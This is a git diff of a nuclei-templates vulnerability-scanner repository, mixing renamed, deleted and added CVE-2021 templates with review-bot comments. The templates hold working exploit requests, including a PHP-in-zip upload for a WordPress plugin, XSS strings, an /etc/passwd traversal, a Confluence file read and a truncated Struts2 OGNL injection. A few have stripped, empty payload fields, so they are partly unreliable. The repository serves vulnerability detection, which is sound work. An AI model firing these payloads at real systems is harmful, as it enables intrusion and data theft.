diff --git a/nuclei-templates/CVE-2021/CVE-2021-24275.yaml b/nuclei-templates/CVE-2021/cve-2021-24275.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24275.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24275.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24276.yaml b/nuclei-templates/CVE-2021/cve-2021-24276.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24276.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24276.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24284.yaml b/nuclei-templates/CVE-2021/cve-2021-24284.yaml
deleted file mode 100644
index 3f6dad51b2..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-24284.yaml
+++ /dev/null
@@ -1,71 +0,0 @@ -id: CVE-2021-24284 - -info: - name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload - author: lamscun,pussycat0x,pdteam - severity: critical - description: | - WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - reference: - - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 - - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ - - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ - - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24284 - cwe-id: CWE-434 - tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp - -variables: - zip_file: "{{to_lower(rand_text_alpha(6))}}" - php_file: "{{to_lower(rand_text_alpha(2))}}.php" - php_cmd: "" - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 - - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" - Content-Type: application/octet-stream - - 
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fontsetname" - - {{zip_file}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="action" - - uploadFontIcon - --------------------------d3be34324392a708-- - - - | - GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - - type: word - part: body_2 - words: - - "phpinfo()" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24285.yaml b/nuclei-templates/CVE-2021/cve-2021-24285.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24285.yaml rename to nuclei-templates/CVE-2021/cve-2021-24285.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24300.yaml b/nuclei-templates/CVE-2021/cve-2021-24300.yaml new file mode 100644 index 0000000000..109f93ea66 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24300.yaml 
@@ -0,0 +1,51 @@
+id: CVE-2021-24300
+
+info:
+ name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
+ author: cckuailong
+ severity: medium
+ description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
+ reference:
+ - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24300
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="\"onmouseover=alert(document.domain);//">'
+ - "PickPlugins Product Slider"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24316.yaml b/nuclei-templates/CVE-2021/cve-2021-24316.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24316.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24316.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24320.yaml b/nuclei-templates/CVE-2021/cve-2021-24320.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24320.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24320.yaml
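Review bot: The `name` and `description` of the cve-2021-24300 hunk attribute the flaw to WooCommerce itself (`WordPress WooCommerce <1.13.22`), yet the request targets `post_type=wcps` and the body matcher requires `"PickPlugins Product Slider"`, which suggests the affected component is a PickPlugins product-slider add-on for WooCommerce rather than WooCommerce core; the wpscan reference in the hunk should settle which name is right, and the `name:` line should then identify the plugin instead of the platform. The template also consumes `{{username}}` and `{{password}}` without declaring them under `variables:`; a comment such as `# username/password must be supplied at run time (authenticated template)` above `requests:` would spare operators a failed login round-trip.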
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24358.yaml b/nuclei-templates/CVE-2021/cve-2021-24358.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24358.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24358.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24364.yaml b/nuclei-templates/CVE-2021/cve-2021-24364.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24364.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24364.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24370.yaml b/nuclei-templates/CVE-2021/cve-2021-24370.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24370.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24370.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24387.yaml b/nuclei-templates/CVE-2021/cve-2021-24387.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24387.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24387.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24389.yaml b/nuclei-templates/CVE-2021/cve-2021-24389.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24389.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24389.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24406.yaml b/nuclei-templates/CVE-2021/cve-2021-24406.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24406.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24406.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24495.yaml b/nuclei-templates/CVE-2021/cve-2021-24495.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24495.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24495.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24926.yaml b/nuclei-templates/CVE-2021/cve-2021-24926.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24926.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24926.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24991.yaml b/nuclei-templates/CVE-2021/cve-2021-24991.yaml deleted file mode 100644 index 14c8b6e45f..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-24991.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-24991 - -info: - name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS - author: cckuailong - severity: medium - description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site - Scripting in the admin dashboard. - reference: - - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2021-24991 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" - - "WooCommerce PDF Invoices" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml b/nuclei-templates/CVE-2021/cve-2021-25055.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-25055.yaml rename to nuclei-templates/CVE-2021/cve-2021-25055.yaml 
diff --git a/nuclei-templates/CVE-2021/cve-2021-25085.yaml b/nuclei-templates/CVE-2021/cve-2021-25085.yaml deleted file mode 100644 index 250ce81d36..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-25085.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-25085 - -info: - name: WOOF WordPress plugin - Cross-Site Scripting - author: Maximus Decimus - severity: medium - description: | - The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 - - https://plugins.trac.wordpress.org/changeset/2648751 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25085 - metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"additional_fields":[""]}' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/cve-2021-25118.yaml b/nuclei-templates/CVE-2021/cve-2021-25118.yaml new file mode 100644 index 0000000000..b82074a3bf --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25118.yaml 
@@ -0,0 +1,45 @@
+id: CVE-2021-25118
+
+info:
+ name: Yoast SEO < 17.3 - Path Disclosure
+ author: DhiyaneshDK
+ severity: medium
+ description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
+ reference:
+ - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25118
+ - https://plugins.trac.wordpress.org/changeset/2608691
+ remediation: Fixed in version 17.3
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-25118
+ cwe-id: CWE-200
+ tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '"path":"(.*)/wp-content\\(.*)","size'
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"path":"(.*)/wp-content\\(.*)","size'
diff --git a/nuclei-templates/CVE-2021/cve-2021-25120.yaml b/nuclei-templates/CVE-2021/cve-2021-25120.yaml
new file mode 100644
index 0000000000..28aa3f7856
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-25120.yaml
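Review bot: The matcher regex `'"path":"(.*)/wp-content\\(.*)","size'` in the cve-2021-25118 hunk is single-quoted, so the engine receives `\\`, i.e. it requires a literal backslash immediately after `wp-content`; as written it appears to match only a JSON-escaped Windows-style path, and a disclosure rendered as `/wp-content/uploads/...` on a Linux host would be missed. If that restriction is deliberate it deserves a comment above the regex; otherwise accepting either separator, e.g. `- '"path":"(.*)/wp-content[\\/](.*)","size'`, covers both layouts. The extractor at the end of the hunk repeats the same pattern, so both copies need to agree, and the `description` should also name the plugin ("The plugin discloses…" reads oddly when only `name:` mentions Yoast SEO).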
@@ -0,0 +1,50 @@
+id: CVE-2021-25120
+
+info:
+ name: Easy Social Feed < 6.2.7 - Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
+ reference:
+ - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
+ - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25120
+ cwe-id: CWE-79
+ tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'type' : ''"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25864.yaml b/nuclei-templates/CVE-2021/cve-2021-25864.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-25864.yaml
rename to nuclei-templates/CVE-2021/cve-2021-25864.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-26085.yaml b/nuclei-templates/CVE-2021/cve-2021-26085.yaml
deleted file mode 100644
index 8d7382901f..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-26085.yaml
+++ /dev/null
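Review bot: The second request in the cve-2021-25120 hunk sends an empty `type=` value and the body matcher then looks for the literal `'type' : ''`, which is what the page would emit for an empty parameter whether or not the plugin escapes it; as far as the hunk shows, the template cannot tell a patched 6.2.7+ install from a vulnerable one and will report every reachable instance of that admin page. The description also only says "a parameter" without naming which one is reflected, so the check reads as a plugin-page fingerprint rather than an injection test. A comment above the matcher such as `# matches the plugin's admin-page output only; does not confirm the reflected value is unescaped` would set expectations until the matcher is tightened.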
@@ -1,33 +0,0 @@ -id: CVE-2021-26085 -info: - name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 - author: princechaddha - severity: medium - description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. - reference: - - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2021-26085 - cwe-id: CWE-862 - -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "Confluence" - - "com.atlassian.confluence.setup.ConfluenceAppConfig" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/cve-2021-26598.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-26598.yaml rename to nuclei-templates/CVE-2021/cve-2021-26598.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-26702.yaml b/nuclei-templates/CVE-2021/cve-2021-26702.yaml new file mode 100644 index 0000000000..a543bb5aa1 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26702.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2021-26702
+
+info:
+ name: EPrints 3.4.2 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
+ reference:
+ - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
+ - https://files.eprints.org/2548/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26702
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-26702
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,eprints
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/nuclei-templates/CVE-2021/cve-2021-27519.yaml b/nuclei-templates/CVE-2021/cve-2021-27519.yaml
new file mode 100644
index 0000000000..93e44aea56
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-27519.yaml
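Review bot: The first matcher in the cve-2021-26702 hunk carries an empty word (`- ""`), which matches every response, so with `matchers-condition: and` the template reduces to "HTTP 200 with text/html" and will flag any EPrints host as vulnerable; if the expected reflected string was lost when this page was rendered (angle-bracket content appears stripped elsewhere in this diff), it needs to be restored, otherwise the matcher must carry the string the response is expected to echo and should also say `part: body` like the other templates in this commit. Separately, the description's `cgi/dataset_ dictionary URI` has a stray space and should read `cgi/dataset_dictionary`, matching the request path.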
@@ -0,0 +1,45 @@
+id: CVE-2021-27519
+
+info:
+ name: FUDForum 3.1.0 - Cross-Site Scripting
+ author: kh4sh3i
+ severity: medium
+ description: |
+ FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/49942
+ - https://github.com/fudforum/FUDforum/issues/2
+ - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27519
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-27519
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: 'http.html:"Powered by: FUDforum"'
+ verified: "true"
+ tags: xss,fudforum,edb,packetstorm,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'highlightSearchTerms("x" onmouseover=alert(1) x="");'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/nuclei-templates/CVE-2021/CVE-2021-27651.yaml b/nuclei-templates/CVE-2021/cve-2021-27651.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-27651.yaml
rename to nuclei-templates/CVE-2021/cve-2021-27651.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-27748.yaml b/nuclei-templates/CVE-2021/cve-2021-27748.yaml
deleted file mode 100644
index 50186d4e60..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-27748.yaml
+++ /dev/null
@@ -1,40 +0,0 @@ -id: CVE-2021-27748 - -info: - name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery - author: pdteam - severity: high - description: | - IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268 - classification: - cve-id: CVE-2021-27748 - metadata: - verified: true - shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2021,hcl,ibm,ssrf,websphere - -requests: - - method: GET - path: - - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - "Interactsh Server" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28150.yaml b/nuclei-templates/CVE-2021/cve-2021-28150.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28150.yaml rename to nuclei-templates/CVE-2021/cve-2021-28150.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28151.yaml b/nuclei-templates/CVE-2021/cve-2021-28151.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28151.yaml rename to nuclei-templates/CVE-2021/cve-2021-28151.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-28377.yaml b/nuclei-templates/CVE-2021/cve-2021-28377.yaml new file mode 100644 index 0000000000..03cc1bbced --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-28377.yaml 
@@ -0,0 +1,33 @@
+id: CVE-2021-28377
+
+info:
+ name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
+ author: 0x_Akoko
+ severity: medium
+ description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
+ reference:
+ - https://herolab.usd.de/en/security-advisories/usd-2021-0007/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-28377
+ cwe-id: CWE-22
+ tags: cve,cve2021,chronoforums,lfi,joomla
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/nuclei-templates/CVE-2021/CVE-2021-28854.yaml b/nuclei-templates/CVE-2021/cve-2021-28854.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-28854.yaml
rename to nuclei-templates/CVE-2021/cve-2021-28854.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-28937.yaml b/nuclei-templates/CVE-2021/cve-2021-28937.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-28937.yaml
rename to nuclei-templates/CVE-2021/cve-2021-28937.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-29203.yaml b/nuclei-templates/CVE-2021/cve-2021-29203.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-29203.yaml
rename to nuclei-templates/CVE-2021/cve-2021-29203.yaml
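Review bot: The `- type: regex` matcher in the cve-2021-28377 hunk omits `part:`, whereas the other templates added in this commit (cve-2021-25120, cve-2021-27519) spell out `part: body` or `part: header` on every word/regex matcher; relying on the engine default works but is inconsistent, so adding `part: body` under `- type: regex` keeps the style uniform and makes the intent visible. The `description` also promises reading of "the Joomla! configuration file which contains credentials" while the template only demonstrates the `/etc/passwd` read, so a short note that the matcher proves traversal rather than credential exposure would keep the finding honest.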
diff --git a/nuclei-templates/CVE-2021/CVE-2021-29490.yaml b/nuclei-templates/CVE-2021/cve-2021-29490.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-29490.yaml
rename to nuclei-templates/CVE-2021/cve-2021-29490.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-30049.yaml b/nuclei-templates/CVE-2021/cve-2021-30049.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-30049.yaml
rename to nuclei-templates/CVE-2021/cve-2021-30049.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-3017.yaml b/nuclei-templates/CVE-2021/cve-2021-3017.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-3017.yaml
rename to nuclei-templates/CVE-2021/cve-2021-3017.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-31589.yaml b/nuclei-templates/CVE-2021/cve-2021-31589.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-31589.yaml
rename to nuclei-templates/CVE-2021/cve-2021-31589.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-31755.yaml b/nuclei-templates/CVE-2021/cve-2021-31755.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-31755.yaml
rename to nuclei-templates/CVE-2021/cve-2021-31755.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-31805.yaml b/nuclei-templates/CVE-2021/cve-2021-31805.yaml
deleted file mode 100644
index 2394432a9e..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-31805.yaml
+++ /dev/null
@@ -1,51 +0,0 @@ -id: CVE-2021-31805 - -info: - name: Apache Struts2 S2-062 - Remote Code Execution - author: taielab - severity: critical - description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-062 - - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-31805 - cwe-id: CWE-917 - tags: cve,cve2021,apache,rce,struts,struts2 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Length: 1095 - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Disposition: form-data; name="id" - - %{ - (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + - (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + - (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - 